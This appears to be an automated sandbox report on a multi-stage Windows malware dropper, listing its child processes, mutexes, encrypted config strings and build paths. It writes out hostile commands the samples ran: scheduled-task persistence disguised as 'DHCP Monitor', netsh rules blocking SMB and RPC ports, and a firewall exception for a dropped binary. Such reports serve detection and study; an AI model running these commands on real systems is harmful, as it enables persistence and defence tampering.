                    Source: C:\Users\user\AppData\Roaming\___11.19.exeProcess created: C:\Users\user\AppData\Roaming\HD____11.19.exe C:\Users\user\AppData\Roaming\HD____11.19.exe
                    Source: unknownProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe -k " "
                    Source: C:\Users\user\AppData\Roaming\22.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                    Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\mediaget.exe "C:\Users\user\AppData\Roaming\mediaget.exe" ..
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exeProcess created: C:\Users\user\AppData\Roaming\healastounding.exe "C:\Users\user\AppData\Roaming\healastounding.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exeProcess created: C:\Users\user\AppData\Roaming\Pluto Panel.exe "C:\Users\user\AppData\Roaming\Pluto Panel.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exeProcess created: C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe "C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exeProcess created: C:\Users\user\AppData\Roaming\22.exe "C:\Users\user\AppData\Roaming\22.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exeProcess created: C:\Users\user\AppData\Roaming\___11.19.exe "C:\Users\user\AppData\Roaming\___11.19.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\healastounding.exeProcess created: C:\Users\user\AppData\Roaming\test.exe "C:\Users\user\AppData\Roaming\test.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\healastounding.exeProcess created: C:\Users\user\AppData\Roaming\gay.exe "C:\Users\user\AppData\Roaming\gay.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\healastounding.exeProcess created: C:\Users\user\AppData\Roaming\Opus.exe "C:\Users\user\AppData\Roaming\Opus.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\healastounding.exeProcess created: C:\Users\user\AppData\Roaming\aaa.exe "C:\Users\user\AppData\Roaming\aaa.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\healastounding.exeProcess created: C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe "C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\healastounding.exeProcess created: C:\Users\user\AppData\Roaming\4.exe "C:\Users\user\AppData\Roaming\4.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\healastounding.exeProcess created: C:\Users\user\AppData\Roaming\a.exe "C:\Users\user\AppData\Roaming\a.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exeProcess created: C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe "C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\gay.exeProcess created: C:\Users\user\AppData\Roaming\mediaget.exe "C:\Users\user\AppData\Roaming\mediaget.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp4896.tmpJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmp5D87.tmpJump to behavior
                    Source: C:\Users\user\AppData\Roaming\22.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh ipsec static add policy name=Block
                    Source: C:\Users\user\AppData\Roaming\22.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh ipsec static add filterlist name=Filter1
                    Source: C:\Users\user\AppData\Roaming\22.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                    Source: C:\Users\user\AppData\Roaming\22.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                    Source: C:\Users\user\AppData\Roaming\22.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                    Source: C:\Users\user\AppData\Roaming\22.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                    Source: C:\Users\user\AppData\Roaming\22.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                    Source: C:\Users\user\AppData\Roaming\22.exeProcess created: unknown unknown
                    Source: C:\Users\user\AppData\Roaming\aaa.exeProcess created: C:\Users\user\AppData\Roaming\aaa.exe C:\Users\user\AppData\Roaming\aaa.exe
                    Source: C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exeProcess created: C:\Users\user\AppData\Local\Temp\FFDvbcrdfqs.exe "C:\Users\user\AppData\Local\Temp\FFDvbcrdfqs.exe"
                    Source: C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exeProcess created: C:\Users\user\AppData\Local\Temp\Dcvxaamev.exe "C:\Users\user\AppData\Local\Temp\Dcvxaamev.exe"
                    Source: C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exeProcess created: unknown unknown
                    Source: C:\Users\user\AppData\Roaming\4.exeProcess created: C:\Users\user\AppData\Roaming\3.exe "C:\Users\user\AppData\Roaming\3.exe"
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Users\user\AppData\Roaming\mediaget.exe" "mediaget.exe" ENABLE
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeFile created: C:\Users\user\AppData\Local\Temp\tmp4896.tmpJump to behavior
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, Pluto Panel.exe, 00000005.00000002.711210574.0000000004691000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, Pluto Panel.exe, 00000005.00000002.711210574.0000000004691000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000002.711210574.0000000004691000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, Pluto Panel.exe, 00000005.00000002.711210574.0000000004691000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, Pluto Panel.exe, 00000005.00000002.711210574.0000000004691000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, Pluto Panel.exe, 00000005.00000002.711210574.0000000004691000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, Pluto Panel.exe, 00000005.00000002.711210574.0000000004691000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\healastounding.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                    Source: C:\Users\user\AppData\Roaming\test.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\gay.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\gay.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                    Source: C:\Users\user\AppData\Roaming\gay.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aaa.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                    Source: Pluto Panel.exe.0.dr, Form1.csBase64 encoded string: 'jKnnv2OtHmCVbL4ukcqXfe1z4H4de/YNg8JCpqpr9q1DDxgSWA+kEDbvzq/lfM8KFapQuuMTsxM2O5Tzlzm+pg==', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: test.exe.4.dr, Client/Settings.csBase64 encoded string: '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'
                    Source: 5.0.Pluto Panel.exe.f10000.8.unpack, Form1.csBase64 encoded string: 'jKnnv2OtHmCVbL4ukcqXfe1z4H4de/YNg8JCpqpr9q1DDxgSWA+kEDbvzq/lfM8KFapQuuMTsxM2O5Tzlzm+pg==', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 5.2.Pluto Panel.exe.f10000.0.unpack, Form1.csBase64 encoded string: 'jKnnv2OtHmCVbL4ukcqXfe1z4H4de/YNg8JCpqpr9q1DDxgSWA+kEDbvzq/lfM8KFapQuuMTsxM2O5Tzlzm+pg==', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 5.0.Pluto Panel.exe.f10000.4.unpack, Form1.csBase64 encoded string: 'jKnnv2OtHmCVbL4ukcqXfe1z4H4de/YNg8JCpqpr9q1DDxgSWA+kEDbvzq/lfM8KFapQuuMTsxM2O5Tzlzm+pg==', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 5.0.Pluto Panel.exe.f10000.12.unpack, Form1.csBase64 encoded string: 'jKnnv2OtHmCVbL4ukcqXfe1z4H4de/YNg8JCpqpr9q1DDxgSWA+kEDbvzq/lfM8KFapQuuMTsxM2O5Tzlzm+pg==', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: C:\Users\user\AppData\Roaming\Opus.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{c5a0b6d8-d1f7-45cd-943b-d5fda411e988}
                    Source: C:\Users\user\AppData\Roaming\test.exeMutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_6SI8OkPnk
                    Source: C:\Users\user\AppData\Roaming\Opus.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                    Source: C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exeMutant created: \Sessions\1\BaseNamedObjects\serhershesrhsfesrf
                    Source: Pluto Panel.exe.0.dr, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                    Source: Pluto Panel.exe.0.dr, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                    Source: Pluto Panel.exe.0.dr, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                    Source: Pluto Panel.exe.0.dr, Form1.csCryptographic APIs: 'CreateDecryptor'
                    Source: Opus.exe.4.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: Opus.exe.4.dr, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
                    Source: Opus.exe.4.dr, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
                    Source: C:\Users\user\AppData\Roaming\test.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\test.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dllJump to behavior
                    Source: RIP_YOUR_PC_LOL.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dllJump to behavior
                    Source: RIP_YOUR_PC_LOL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: RIP_YOUR_PC_LOL.exeStatic file information: File size 23633920 > 1048576
                    Source: RIP_YOUR_PC_LOL.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x1689600
                    Source: RIP_YOUR_PC_LOL.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.374606826.0000000001F6B000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.388952115.00000000059C7000.00000004.00000800.00020000.00000000.sdmp, healastounding.exe, healastounding.exe, 00000004.00000000.385235005.0000000000902000.00000002.00000001.01000000.00000005.sdmp, 4.exe, 00000010.00000000.446983407.0000000001203000.00000002.00000001.01000000.0000000E.sdmp, 4.exe, 00000010.00000002.519990989.0000000001203000.00000002.00000001.01000000.0000000E.sdmp
                    Source: Binary string: D:\buildbot\slave1\desktop_screen\build\bin\active_desktop_launcher.pdb source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, 22.exe, 0000000B.00000000.422804028.000000000042B000.00000008.00000001.01000000.0000000B.sdmp
                    Source: Binary string: C:\nutideyebibede\soy\gebetugito\meliyo zodoz.pdb source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, 0fd7de5367376231a788872005d7ed4f.exe, 00000007.00000000.407475822.000000000041E000.00000002.00000001.01000000.00000008.sdmp, 0fd7de5367376231a788872005d7ed4f.exe, 00000007.00000002.465903756.000000000041E000.00000002.00000001.01000000.00000008.sdmp, 0fd7de5367376231a788872005d7ed4f.exe, 0000000F.00000000.436842136.000000000041E000.00000002.00000001.01000000.00000008.sdmp
                    Source: Binary string: ]C:\nutideyebibede\soy\gebetugito\meliyo zodoz.pdb source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, 0fd7de5367376231a788872005d7ed4f.exe, 00000007.00000000.407475822.000000000041E000.00000002.00000001.01000000.00000008.sdmp, 0fd7de5367376231a788872005d7ed4f.exe, 00000007.00000002.465903756.000000000041E000.00000002.00000001.01000000.00000008.sdmp, 0fd7de5367376231a788872005d7ed4f.exe, 0000000F.00000000.436842136.000000000041E000.00000002.00000001.01000000.00000008.sdmp
                    Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, Pluto Panel.exe, Pluto Panel.exe, 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Pluto Panel.exe, 00000005.00000002.710948269.0000000003B3A000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000002.712472379.0000000007710000.00000004.00000001.00040000.00000000.sdmp, Pluto Panel.exe, 00000005.00000002.705753147.0000000003691000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000002.706244077.0000000003705000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, Pluto Panel.exe, 00000005.00000002.711210574.0000000004691000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmp
